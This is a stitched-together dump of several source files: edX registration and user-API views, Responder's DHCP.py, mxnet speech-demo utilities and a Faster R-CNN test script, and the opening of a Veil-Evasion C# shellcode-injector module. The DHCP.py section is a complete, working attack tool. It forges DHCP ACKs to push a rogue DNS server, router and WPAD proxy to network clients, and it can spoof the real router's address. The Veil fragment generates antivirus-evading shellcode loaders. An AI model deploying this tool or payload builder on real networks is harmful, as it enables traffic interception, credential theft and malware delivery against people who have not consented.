gender_label = _(u"Gender")
form_desc.add_field(
"gender",
label=gender_label,
field_type="select",
options=UserProfile.GENDER_CHOICES,
include_default_option=True,
required=required
)
def _add_year_of_birth_field(self, form_desc, required=True):
"""Add a year of birth field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a dropdown menu on the registration
# form used to select the user's year of birth.
yob_label = _(u"Year of birth")
options = [(unicode(year), unicode(year)) for year in UserProfile.VALID_YEARS]
form_desc.add_field(
"year_of_birth",
label=yob_label,
field_type="select",
options=options,
include_default_option=True,
required=required
)
def _add_mailing_address_field(self, form_desc, required=True):
"""Add a mailing address field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a field on the registration form
# meant to hold the user's mailing address.
mailing_address_label = _(u"Mailing address")
form_desc.add_field(
"mailing_address",
label=mailing_address_label,
field_type="textarea",
required=required
)
def _add_goals_field(self, form_desc, required=True):
"""Add a goals field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This phrase appears above a field on the registration form
# meant to hold the user's reasons for registering with edX.
goals_label = _(
u"Tell us why you're interested in {platform_name}"
).format(platform_name=settings.PLATFORM_NAME)
form_desc.add_field(
"goals",
label=goals_label,
field_type="textarea",
required=required
)
def _add_city_field(self, form_desc, required=True):
"""Add a city field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a field on the registration form
# which allows the user to input the city in which they live.
city_label = _(u"City")
form_desc.add_field(
"city",
label=city_label,
required=required
)
def _add_country_field(self, form_desc, required=True):
"""Add a country field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a dropdown menu on the registration
# form used to select the country in which the user lives.
country_label = _(u"Country")
error_msg = _(u"Please select your Country.")
form_desc.add_field(
"country",
label=country_label,
field_type="select",
options=list(countries),
include_default_option=True,
required=required,
error_messages={
"required": error_msg
}
)
def _add_honor_code_field(self, form_desc, required=True):
"""Add an honor code field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Separate terms of service and honor code checkboxes
if self._is_field_visible("terms_of_service"):
terms_text = _(u"Honor Code")
# Combine terms of service and honor code checkboxes
else:
# Translators: This is a legal document users must agree to
# in order to register a new account.
terms_text = _(u"Terms of Service and Honor Code")
terms_link = u"<a href=\"{url}\">{terms_text}</a>".format(
url=marketing_link("HONOR"),
terms_text=terms_text
)
# Translators: "Terms of Service" is a legal document users must agree to
# in order to register a new account.
label = _(
u"I agree to the {platform_name} {terms_of_service}."
).format(
platform_name=settings.PLATFORM_NAME,
terms_of_service=terms_link
)
# Translators: "Terms of Service" is a legal document users must agree to
# in order to register a new account.
error_msg = _(
u"You must agree to the {platform_name} {terms_of_service}."
).format(
platform_name=settings.PLATFORM_NAME,
terms_of_service=terms_link
)
form_desc.add_field(
"honor_code",
label=label,
field_type="checkbox",
default=False,
required=required,
error_messages={
"required": error_msg
}
)
def _add_terms_of_service_field(self, form_desc, required=True):
"""Add a terms of service field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This is a legal document users must agree to
# in order to register a new account.
terms_text = _(u"Terms of Service")
terms_link = u"<a href=\"{url}\">{terms_text}</a>".format(
url=marketing_link("TOS"),
terms_text=terms_text
)
# Translators: "Terms of service" is a legal document users must agree to
# in order to register a new account.
label = _(
u"I agree to the {platform_name} {terms_of_service}."
).format(
platform_name=settings.PLATFORM_NAME,
terms_of_service=terms_link
)
# Translators: "Terms of service" is a legal document users must agree to
# in order to register a new account.
error_msg = _(
u"You must agree to the {platform_name} {terms_of_service}."
).format(
platform_name=settings.PLATFORM_NAME,
terms_of_service=terms_link
)
form_desc.add_field(
"terms_of_service",
label=label,
field_type="checkbox",
default=False,
required=required,
error_messages={
"required": error_msg
}
)
def _apply_third_party_auth_overrides(self, request, form_desc):
"""Modify the registration form if the user has authenticated with a third-party provider.
If a user has successfully authenticated with a third-party provider,
but does not yet have an account with EdX, we want to fill in
the registration form with any info that we get from the
provider.
This will also hide the password field, since we assign users a default
(random) password on the assumption that they will be using
third-party auth to log in.
Arguments:
request (HttpRequest): The request for the registration form, used
to determine if the user has successfully authenticated
with a third-party provider.
form_desc (FormDescription): The registration form description
"""
if third_party_auth.is_enabled():
running_pipeline = third_party_auth.pipeline.get(request)
if running_pipeline:
current_provider = third_party_auth.provider.Registry.get_from_pipeline(running_pipeline)
# Override username / email / full name
field_overrides = current_provider.get_register_form_data(
running_pipeline.get('kwargs')
)
for field_name in self.DEFAULT_FIELDS:
if field_name in field_overrides:
form_desc.override_field_properties(
field_name, default=field_overrides[field_name]
)
# Hide the password field
form_desc.override_field_properties(
"password",
default="",
field_type="hidden",
required=False,
label="",
instructions="",
restrictions={}
)
class PasswordResetView(APIView):
"""HTTP end-point for GETting a description of the password reset form. """
# This end-point is available to anonymous users,
# so do not require authentication.
authentication_classes = []
@method_decorator(ensure_csrf_cookie)
def get(self, request): # pylint: disable=unused-argument
"""Return a description of the password reset form.
This decouples clients from the API definition:
if the API decides to modify the form, clients won't need
to be updated.
See `user_api.helpers.FormDescription` for examples
of the JSON-encoded form description.
Returns:
HttpResponse
"""
form_desc = FormDescription("post", reverse("password_change_request"))
# Translators: This label appears above a field on the password reset
# form meant to hold the user's email address.
email_label = _(u"Email")
# Translators: This example email address is used as a placeholder in
# a field on the password reset form meant to hold the user's email address.
email_placeholder = _(u"[email protected]")
# Translators: These instructions appear on the password reset form,
# immediately below a field meant to hold the user's email address.
email_instructions = _(
u"The email address you used to register with {platform_name}"
).format(platform_name=settings.PLATFORM_NAME)
form_desc.add_field(
"email",
field_type="email",
label=email_label,
placeholder=email_placeholder,
instructions=email_instructions,
restrictions={
"min_length": EMAIL_MIN_LENGTH,
"max_length": EMAIL_MAX_LENGTH,
}
)
return HttpResponse(form_desc.to_json(), content_type="application/json")
class UserViewSet(viewsets.ReadOnlyModelViewSet):
authentication_classes = (authentication.SessionAuthentication,)
permission_classes = (ApiKeyHeaderPermission,)
queryset = User.objects.all().prefetch_related("preferences")
serializer_class = UserSerializer
paginate_by = 10
paginate_by_param = "page_size"
class ForumRoleUsersListView(generics.ListAPIView):
"""
Forum roles are represented by a list of user dicts
"""
authentication_classes = (authentication.SessionAuthentication,)
permission_classes = (ApiKeyHeaderPermission,)
serializer_class = UserSerializer
paginate_by = 10
paginate_by_param = "page_size"
def get_queryset(self):
"""
Return a list of users with the specified role/course pair
"""
name = self.kwargs['name']
course_id_string = self.request.QUERY_PARAMS.get('course_id')
if not course_id_string:
raise ParseError('course_id must be specified')
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id_string)
role = Role.objects.get_or_create(course_id=course_id, name=name)[0]
users = role.users.all()
return users
class UserPreferenceViewSet(viewsets.ReadOnlyModelViewSet):
authentication_classes = (authentication.SessionAuthentication,)
permission_classes = (ApiKeyHeaderPermission,)
queryset = UserPreference.objects.all()
filter_backends = (filters.DjangoFilterBackend,)
filter_fields = ("key", "user")
serializer_class = UserPreferenceSerializer
paginate_by = 10
paginate_by_param = "page_size"
class PreferenceUsersListView(generics.ListAPIView):
authentication_classes = (authentication.SessionAuthentication,)
permission_classes = (ApiKeyHeaderPermission,)
serializer_class = UserSerializer
paginate_by = 10
paginate_by_param = "page_size"
def get_queryset(self):
return User.objects.filter(preferences__key=self.kwargs["pref_key"]).prefetch_related("preferences")
class UpdateEmailOptInPreference(APIView):
"""View for updating the email opt in preference. """
authentication_classes = (SessionAuthenticationAllowInactiveUser,)
@method_decorator(require_post_params(["course_id", "email_opt_in"]))
@method_decorator(ensure_csrf_cookie)
def post(self, request):
""" Post function for updating the email opt in preference.
Allows the modification or creation of the email opt in preference at an
organizational level.
Args:
request (Request): The request should contain the following POST parameters:
* course_id: The slash separated course ID. Used to determine the organization
for this preference setting.
* email_opt_in: "True" or "False" to determine if the user is opting in for emails from
this organization. If the string does not match "True" (case insensitive) it will
assume False.
"""
course_id = request.DATA['course_id']
try:
org = locator.CourseLocator.from_string(course_id).org
except InvalidKeyError:
return HttpResponse(
status=400,
content="No course '{course_id}' found".format(course_id=course_id),
content_type="text/plain"
)
# Only check for true. All other values are False.
email_opt_in = request.DATA['email_opt_in'].lower() == 'true'
update_email_opt_in(request.user, org, email_opt_in)
return HttpResponse(status=status.HTTP_200_OK)
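# Illustrative request flow for UpdateEmailOptInPreference (URL and values are
# assumptions, not from this module): a client POSTs form-encoded `course_id`
# and `email_opt_in` parameters, e.g. course_id=edX/DemoX/Demo_Course and
# email_opt_in=True; any value other than the case-insensitive string "True"
# is stored as False via update_email_opt_in().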
|
agpl-3.0
|
jorik041/Responder
|
tools/DHCP.py
|
10
|
13833
|
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import struct
import socket
import re
import optparse
import ConfigParser
import os
BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
sys.path.insert(0, BASEDIR)
from odict import OrderedDict
from packets import Packet
from utils import *
parser = optparse.OptionParser(usage='python %prog -I eth0 -d pwned.com -p 10.20.30.40 -s 10.20.30.1 -r 10.20.40.1', prog=sys.argv[0],)
parser.add_option('-I', '--interface', action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
parser.add_option('-d', '--dnsname', action="store", help="DNS name to inject; if you don't want to inject a DNS server, provide the original one.", metavar="pwned.com", default="pwned.com", dest="DNSNAME")
parser.add_option('-r', '--router', action="store", help="The ip address of the router or yours if you want to intercept traffic.", metavar="10.20.1.1",dest="RouterIP")
parser.add_option('-p', '--primary', action="store", help="The ip address of the original primary DNS server or yours", metavar="10.20.1.10",dest="DNSIP")
parser.add_option('-s', '--secondary', action="store", help="The ip address of the original secondary DNS server or yours", metavar="10.20.1.11",dest="DNSIP2")
parser.add_option('-n', '--netmask', action="store", help="The netmask of this network", metavar="255.255.255.0", default="255.255.255.0", dest="Netmask")
parser.add_option('-w', '--wpadserver', action="store", help="Your WPAD server string", metavar="\"http://wpadsrv/wpad.dat\"", default="", dest="WPAD")
parser.add_option('-S', action="store_true", help="Spoof the router ip address",dest="Spoof")
parser.add_option('-R', action="store_true", help="Respond to DHCP Requests, inject linux clients (very noisy, this is sent on 255.255.255.255)", dest="Respond_To_Requests")
options, args = parser.parse_args()
def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
if options.Interface is None:
print color("[!]", 1, 1), "-I mandatory option is missing, please provide an interface."
exit(-1)
if options.RouterIP is None:
print color("[!]", 1, 1), "-r mandatory option is missing, please provide the router's IP."
exit(-1)
if options.DNSIP is None:
print color("[!]", 1, 1), "-p mandatory option is missing, please provide the primary DNS server ip address or yours."
exit(-1)
if options.DNSIP2 is None:
print color("[!]", 1, 1), "-s mandatory option is missing, please provide the secondary DNS server ip address or yours."
exit(-1)
print '#############################################################################'
print '## DHCP INFORM TAKEOVER 0.2 ##'
print '## ##'
print '## By default, this script will only inject a new DNS/WPAD ##'
print '## server to a Windows <= XP/2003 machine. ##'
print '## ##'
print '## To inject a DNS server/domain/route on a Windows >= Vista and ##'
print '## any linux box, use -R (can be noisy) ##'
print '## ##'
print '## Use `RespondTo` setting in Responder.conf for in-scope targets only. ##'
print '#############################################################################'
print ''
print color('[*]', 2, 1), 'Listening for events...'
config = ConfigParser.ConfigParser()
config.read(os.path.join(BASEDIR,'Responder.conf'))
RespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
DontRespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])
Interface = options.Interface
Responder_IP = FindLocalIP(Interface)
ROUTERIP = options.RouterIP
NETMASK = options.Netmask
DHCPSERVER = Responder_IP
DNSIP = options.DNSIP
DNSIP2 = options.DNSIP2
DNSNAME = options.DNSNAME
WPADSRV = options.WPAD.strip() + "\\n"
Spoof = options.Spoof
Respond_To_Requests = options.Respond_To_Requests
if Spoof:
DHCPSERVER = ROUTERIP
##### IP Header #####
class IPHead(Packet):
fields = OrderedDict([
("Version", "\x45"),
("DiffServices", "\x00"),
("TotalLen", "\x00\x00"),
("Ident", "\x00\x00"),
("Flags", "\x00\x00"),
("TTL", "\x40"),
("Protocol", "\x11"),
("Checksum", "\x00\x00"),
("SrcIP", ""),
("DstIP", ""),
])
class UDP(Packet):
fields = OrderedDict([
("SrcPort", "\x00\x43"),
("DstPort", "\x00\x44"),
("Len", "\x00\x00"),
("Checksum", "\x00\x00"),
("Data", "\x00\x00"),
])
def calculate(self):
self.fields["Len"] = struct.pack(">h",len(str(self.fields["Data"]))+8)
class DHCPACK(Packet):
fields = OrderedDict([
("MessType", "\x02"),
("HdwType", "\x01"),
("HdwLen", "\x06"),
("Hops", "\x00"),
("Tid", "\x11\x22\x33\x44"),
("ElapsedSec", "\x00\x00"),
("BootpFlags", "\x00\x00"),
("ActualClientIP", "\x00\x00\x00\x00"),
("GiveClientIP", "\x00\x00\x00\x00"),
("NextServerIP", "\x00\x00\x00\x00"),
("RelayAgentIP", "\x00\x00\x00\x00"),
("ClientMac", "\xff\xff\xff\xff\xff\xff"),
("ClientMacPadding", "\x00" *10),
("ServerHostname", "\x00" * 64),
("BootFileName", "\x00" * 128),
("MagicCookie", "\x63\x82\x53\x63"),
("DHCPCode", "\x35"), #DHCP Message
("DHCPCodeLen", "\x01"),
("DHCPOpCode", "\x05"), #Msgtype(ACK)
("Op54", "\x36"),
("Op54Len", "\x04"),
("Op54Str", ""), #DHCP Server
("Op51", "\x33"),
("Op51Len", "\x04"),
("Op51Str", "\x00\x01\x51\x80"), #Lease time, 1 day
("Op1", "\x01"),
("Op1Len", "\x04"),
("Op1Str", ""), #Netmask
("Op15", "\x0f"),
("Op15Len", "\x0e"),
("Op15Str", ""), #DNS Name
("Op3", "\x03"),
("Op3Len", "\x04"),
("Op3Str", ""), #Router
("Op6", "\x06"),
("Op6Len", "\x08"),
("Op6Str", ""), #DNS Servers
("Op252", "\xfc"),
("Op252Len", "\x04"),
("Op252Str", ""), #Wpad Server
("Op255", "\xff"),
("Padding", "\x00"),
])
def calculate(self):
self.fields["Op54Str"] = socket.inet_aton(DHCPSERVER)
self.fields["Op1Str"] = socket.inet_aton(NETMASK)
self.fields["Op3Str"] = socket.inet_aton(ROUTERIP)
self.fields["Op6Str"] = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
self.fields["Op15Str"] = DNSNAME
self.fields["Op252Str"] = WPADSRV
self.fields["Op15Len"] = struct.pack(">b",len(str(self.fields["Op15Str"])))
self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
class DHCPInformACK(Packet):
fields = OrderedDict([
("MessType", "\x02"),
("HdwType", "\x01"),
("HdwLen", "\x06"),
("Hops", "\x00"),
("Tid", "\x11\x22\x33\x44"),
("ElapsedSec", "\x00\x00"),
("BootpFlags", "\x00\x00"),
("ActualClientIP", "\x00\x00\x00\x00"),
("GiveClientIP", "\x00\x00\x00\x00"),
("NextServerIP", "\x00\x00\x00\x00"),
("RelayAgentIP", "\x00\x00\x00\x00"),
("ClientMac", "\xff\xff\xff\xff\xff\xff"),
("ClientMacPadding", "\x00" *10),
("ServerHostname", "\x00" * 64),
("BootFileName", "\x00" * 128),
("MagicCookie", "\x63\x82\x53\x63"),
("Op53", "\x35\x01\x05"), #Msgtype(ACK)
("Op54", "\x36"),
("Op54Len", "\x04"),
("Op54Str", ""), #DHCP Server
("Op1", "\x01"),
("Op1Len", "\x04"),
("Op1Str", ""), #Netmask
("Op15", "\x0f"),
("Op15Len", "\x0e"),
("Op15Str", ""), #DNS Name
("Op3", "\x03"),
("Op3Len", "\x04"),
("Op3Str", ""), #Router
("Op6", "\x06"),
("Op6Len", "\x08"),
("Op6Str", ""), #DNS Servers
("Op252", "\xfc"),
("Op252Len", "\x04"),
("Op252Str", ""), #Wpad Server.
("Op255", "\xff"),
])
def calculate(self):
self.fields["Op54Str"] = socket.inet_aton(DHCPSERVER)
self.fields["Op1Str"] = socket.inet_aton(NETMASK)
self.fields["Op3Str"] = socket.inet_aton(ROUTERIP)
self.fields["Op6Str"] = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
self.fields["Op15Str"] = DNSNAME
self.fields["Op252Str"] = WPADSRV
self.fields["Op15Len"] = struct.pack(">b",len(str(self.fields["Op15Str"])))
self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
def SpoofIP(Spoof):
return ROUTERIP if Spoof else Responder_IP
def RespondToThisIP(ClientIp):
if ClientIp.startswith('127.0.0.'):
return False
if len(RespondTo) and ClientIp not in RespondTo:
return False
if ClientIp in RespondTo or RespondTo == []:
if ClientIp not in DontRespondTo:
return True
return False
def IsUDP(data):
return True if data[0][23:24] == "\x11" else False
def ParseSrcDSTAddr(data):
SrcIP = socket.inet_ntoa(data[0][26:30])
DstIP = socket.inet_ntoa(data[0][30:34])
SrcPort = struct.unpack('>H',data[0][34:36])[0]
DstPort = struct.unpack('>H',data[0][36:38])[0]
return SrcIP, SrcPort, DstIP, DstPort
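# Offset reference for the two helpers above (illustration only): data[0] is a
# raw Ethernet frame, so byte 23 holds the IP protocol field (0x11 = UDP),
# bytes 26-29 and 30-33 the source and destination IPv4 addresses, and bytes
# 34-35 and 36-37 the UDP source and destination ports, assuming the standard
# 14-byte Ethernet header and a 20-byte IP header without options.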
def FindIP(data):
IP = ''.join(re.findall('(?<=\x32\x04)[^EOF]*', data))
return ''.join(IP[0:4])
def ParseDHCPCode(data):
PTid = data[4:8]
Seconds = data[8:10]
CurrentIP = socket.inet_ntoa(data[12:16])
RequestedIP = socket.inet_ntoa(data[16:20])
MacAddr = data[28:34]
MacAddrStr = ':'.join('%02x' % ord(m) for m in MacAddr).upper()
OpCode = data[242:243]
RequestIP = data[245:249]
# DHCP Inform
if OpCode == "\x08":
IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=socket.inet_aton(CurrentIP))
Packet = DHCPInformACK(Tid=PTid, ClientMac=MacAddr, ActualClientIP=socket.inet_aton(CurrentIP), \
GiveClientIP=socket.inet_aton("0.0.0.0"), \
NextServerIP=socket.inet_aton("0.0.0.0"), \
RelayAgentIP=socket.inet_aton("0.0.0.0"), \
ElapsedSec=Seconds)
Packet.calculate()
Buffer = UDP(Data = Packet)
Buffer.calculate()
SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68))
        return 'Acknowledged DHCP Inform for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
# DHCP Request
if OpCode == "\x03" and Respond_To_Requests:
IP = FindIP(data)
if IP:
IPConv = socket.inet_ntoa(IP)
if RespondToThisIP(IPConv):
IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, ElapsedSec=Seconds)
Packet.calculate()
Buffer = UDP(Data = Packet)
Buffer.calculate()
SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
                return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
# DHCP Discover
if OpCode == "\x01" and Respond_To_Requests:
IP = FindIP(data)
if IP:
IPConv = socket.inet_ntoa(IP)
if RespondToThisIP(IPConv):
IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, DHCPOpCode="\x02", ElapsedSec=Seconds)
Packet.calculate()
Buffer = UDP(Data = Packet)
Buffer.calculate()
SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
                return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
def SendDHCP(packet,Host):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
s.sendto(packet, Host)
if __name__ == "__main__":
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
s.bind((Interface, 0x0800))
while True:
try:
data = s.recvfrom(65535)
if IsUDP(data):
SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
if SrcPort == 67 or DstPort == 67:
ret = ParseDHCPCode(data[0][42:])
if ret:
print text("[DHCP] %s" % ret)
except KeyboardInterrupt:
sys.exit("\r%s Exiting..." % color('[*]', 2, 1))
|
gpl-3.0
|
nicklhy/mxnet
|
example/speech-demo/io_func/utils.py
|
25
|
5707
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sys, subprocess, pickle, os, json, logging, socket
import logging.config
import datetime
from . import info
def getRunDir():
return os.path.dirname(os.path.realpath(sys.argv[0]))
def setup_logger(logging_ini):
if logging_ini is not None:
print("Using custom logger")
else:
logging_ini = os.path.join(info.CONFIGS, 'logging.ini')
logging.config.fileConfig(logging_ini)
logger = logging.getLogger(__name__)
logger.info("**************************************************")
logger.info(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"))
logger.info("Host: " + str(socket.gethostname()))
logger.info("Screen: " + os.getenv("STY", "unknown"))
logger.info("PWD: " + os.getenv("PWD", "unknown"))
logger.info("Cmd: " + str(sys.argv))
logger.info("**************************************************")
def to_bool(obj):
if str(obj).lower() in ["true", "1"]:
return True
elif str(obj).lower() in ["false", "0"]:
return False
else:
raise Exception("to_bool: cannot convert to bool")
def line_with_arg(line):
line = line.strip()
    return line != "" and not line.startswith("#")
def parse_conv_spec(conv_spec, batch_size):
# "1x29x29:100,5x5,p2x2:200,4x4,p2x2,f"
conv_spec = conv_spec.replace('X', 'x')
structure = conv_spec.split(':')
conv_layer_configs = []
for i in range(1, len(structure)):
config = {}
elements = structure[i].split(',')
if i == 1:
input_dims = structure[i - 1].split('x')
prev_map_number = int(input_dims[0])
prev_feat_dim_x = int(input_dims[1])
prev_feat_dim_y = int(input_dims[2])
else:
prev_map_number = conv_layer_configs[-1]['output_shape'][1]
prev_feat_dim_x = conv_layer_configs[-1]['output_shape'][2]
prev_feat_dim_y = conv_layer_configs[-1]['output_shape'][3]
current_map_number = int(elements[0])
filter_xy = elements[1].split('x')
filter_size_x = int(filter_xy[0])
filter_size_y = int(filter_xy[1])
pool_xy = elements[2].replace('p','').replace('P','').split('x')
pool_size_x = int(pool_xy[0])
pool_size_y = int(pool_xy[1])
output_dim_x = (prev_feat_dim_x - filter_size_x + 1) / pool_size_x
output_dim_y = (prev_feat_dim_y - filter_size_y + 1) / pool_size_y
config['input_shape'] = (batch_size, prev_map_number, prev_feat_dim_x, prev_feat_dim_y)
config['filter_shape'] = (current_map_number, prev_map_number, filter_size_x, filter_size_y)
config['poolsize'] = (pool_size_x, pool_size_y)
config['output_shape'] = (batch_size, current_map_number, output_dim_x, output_dim_y)
if len(elements) == 4 and elements[3] == 'f':
config['flatten'] = True
else:
config['flatten'] = False
conv_layer_configs.append(config)
return conv_layer_configs
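# Worked example for parse_conv_spec (illustration only): with the spec shown
# in the comment above and batch_size=256, layer 1 turns a (256, 1, 29, 29)
# input into (256, 100, 12, 12) via 100 5x5 filters and 2x2 pooling
# ((29 - 5 + 1) // 2 = 12), and layer 2 then yields (256, 200, 4, 4) with
# flatten=True because of the trailing ",f".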
def _relu(x):
return x * (x > 0)
def _capped_relu(x):
return T.minimum(x * (x > 0), 6)
def _linear(x):
return x * 1.0
def parse_activation(act_str):
print("***", act_str)
if act_str == 'sigmoid':
return T.nnet.sigmoid
elif act_str == 'tanh':
return T.tanh
elif act_str == 'relu':
return _relu
elif act_str == 'capped_relu':
return _capped_relu
elif act_str == 'linear':
return _linear
return T.nnet.sigmoid
def activation_to_txt(act_func):
if act_func == T.nnet.sigmoid:
return 'sigmoid'
if act_func == T.tanh:
return 'tanh'
def parse_two_integers(argument_str):
elements = argument_str.split(":")
int_strs = elements[1].split(",")
return int(int_strs[0]), int(int_strs[1])
"""
Usage:
command = 'mysqladmin create test -uroot -pmysqladmin12'
for line in run_command(command):
print(line)
"""
def run_command(command):
fnull = open(os.devnull, 'w')
p = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=fnull,
shell=True)
return p, iter(p.stdout.readline, b'')
def pickle_load(filename):
f = open(filename, "rb")
try:
obj = pickle.load(f)
except Exception:
f.close()
f = open(filename, "rb")
print("Not a pickled file... try to load as text format: " + filename)
obj = json.load(f)
f.close()
return obj
def pickle_save(obj, filename):
f = open(filename + ".new", "wb")
pickle.dump(obj, f)
f.close()
os.rename(filename + ".new", filename)
def makedirs(path):
if not os.path.exists(path):
os.makedirs(path)
def kahan_add(total, carry, inc):
cs = T.add_no_assoc(carry, inc)
s = T.add_no_assoc(total, cs)
update_carry = T.sub(cs, T.sub(s, total))
update_total = s
return update_total, update_carry
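# Explanatory note (added, not original): kahan_add is the classic Kahan
# compensated-summation update, written with the non-associative add so the
# optimizer cannot re-associate the operations and cancel the compensation.
# For scalars the update reads:
#   cs    = carry + inc          # fold the increment into the compensation
#   s     = total + cs           # accumulate
#   carry = cs - (s - total)     # low-order bits lost by the accumulate step
#   total = s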
|
apache-2.0
|
nicklhy/mxnet
|
example/rcnn/test.py
|
41
|
2878
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
import mxnet as mx
from rcnn.logger import logger
from rcnn.config import config, default, generate_config
from rcnn.tools.test_rcnn import test_rcnn
def parse_args():
parser = argparse.ArgumentParser(description='Test a Faster R-CNN network')
# general
parser.add_argument('--network', help='network name', default=default.network, type=str)
parser.add_argument('--dataset', help='dataset name', default=default.dataset, type=str)
args, rest = parser.parse_known_args()
generate_config(args.network, args.dataset)
parser.add_argument('--image_set', help='image_set name', default=default.test_image_set, type=str)
parser.add_argument('--root_path', help='output data folder', default=default.root_path, type=str)
parser.add_argument('--dataset_path', help='dataset path', default=default.dataset_path, type=str)
# testing
parser.add_argument('--prefix', help='model to test with', default=default.e2e_prefix, type=str)
parser.add_argument('--epoch', help='model to test with', default=default.e2e_epoch, type=int)
parser.add_argument('--gpu', help='GPU device to test with', default=0, type=int)
# rcnn
parser.add_argument('--vis', help='turn on visualization', action='store_true')
parser.add_argument('--thresh', help='valid detection threshold', default=1e-3, type=float)
parser.add_argument('--shuffle', help='shuffle data on visualization', action='store_true')
parser.add_argument('--has_rpn', help='generate proposals on the fly', action='store_true', default=True)
parser.add_argument('--proposal', help='can be ss for selective search or rpn', default='rpn', type=str)
args = parser.parse_args()
return args
def main():
args = parse_args()
logger.info('Called with argument: %s' % args)
ctx = mx.gpu(args.gpu)
test_rcnn(args.network, args.dataset, args.image_set, args.root_path, args.dataset_path,
ctx, args.prefix, args.epoch,
args.vis, args.shuffle, args.has_rpn, args.proposal, args.thresh)
if __name__ == '__main__':
main()
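# Illustrative invocation (values are hypothetical; the flags match parse_args above):
#   python test.py --network vgg --dataset PascalVOC --prefix model/e2e --epoch 10 --gpu 0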
|
apache-2.0
|
liorvh/Veil-Evasion
|
modules/payloads/cs/shellcode_inject/virtual.py
|
12
|
3235
|
"""
C# inline shellcode injector using the VirtualAlloc()/CreateThread() pattern.
Uses basic variable renaming obfuscation.
Adapted from code at:
http://webstersprodigy.net/2012/08/31/av-evading-meterpreter-shell-from-a-net-service/
Module built by @harmj0y
"""
from modules.common import shellcode
from modules.common import helpers
from modules.common import encryption
class Payload:
def __init__(self):
# required
self.language = "cs"
self.extension = "cs"
self.rating = "Poor"
self.description = "C# VirtualAlloc method for inline shellcode injection"
self.shellcode = shellcode.Shellcode()
        # options we require user interaction for - format is {OPTION : [Value, Description]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"USE_ARYA" : ["N", "Use the Arya crypter"]
}
def generate(self):
Shellcode = self.shellcode.generate(self.required_options)
Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:])
# randomize all our variable names, yo'
